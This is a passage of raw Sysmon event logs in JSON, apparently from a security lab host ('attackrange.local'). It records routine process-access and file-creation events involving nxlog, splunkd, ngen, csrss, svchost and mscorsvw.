(x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7258,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:18.588\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:18.588","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7259,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:19.588\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:19.588","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7260,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:00:19.900\r\nProcessGuid: {E2A3D6B1-12F4-5F25-0000-0010DDA20A00}\r\nProcessId: 668\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\29c-0\\System.ServiceModel.dll\r\nCreationUtcTime: 2020-08-01 07:00:19.900","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:00:19.900","ProcessGuid":"{E2A3D6B1-12F4-5F25-0000-0010DDA20A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\29c-0\\System.ServiceModel.dll","CreationUtcTime":"2020-08-01 07:00:19.900","EventReceivedTime":"2020-08-01 07:00:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7261,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:20.213\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1304-5F25-0000-00101EB00A00}\r\nTargetProcessId: 4856\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:20.213","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1304-5F25-0000-00101EB00A00}","TargetProcessId":"4856","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7262,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:20.213\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1304-5F25-0000-00101EB00A00}\r\nTargetProcessId: 4856\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:20.213","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1304-5F25-0000-00101EB00A00}","TargetProcessId":"4856","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7263,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:20.229\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1304-5F25-0000-00101EB00A00}\r\nTargetProcessId: 4856\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:20.229","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1304-5F25-0000-00101EB00A00}","TargetProcessId":"4856","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7264,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:20.588\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:20.588","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7265,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:20.635\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1304-5F25-0000-00107EB40A00}\r\nTargetProcessId: 2908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: 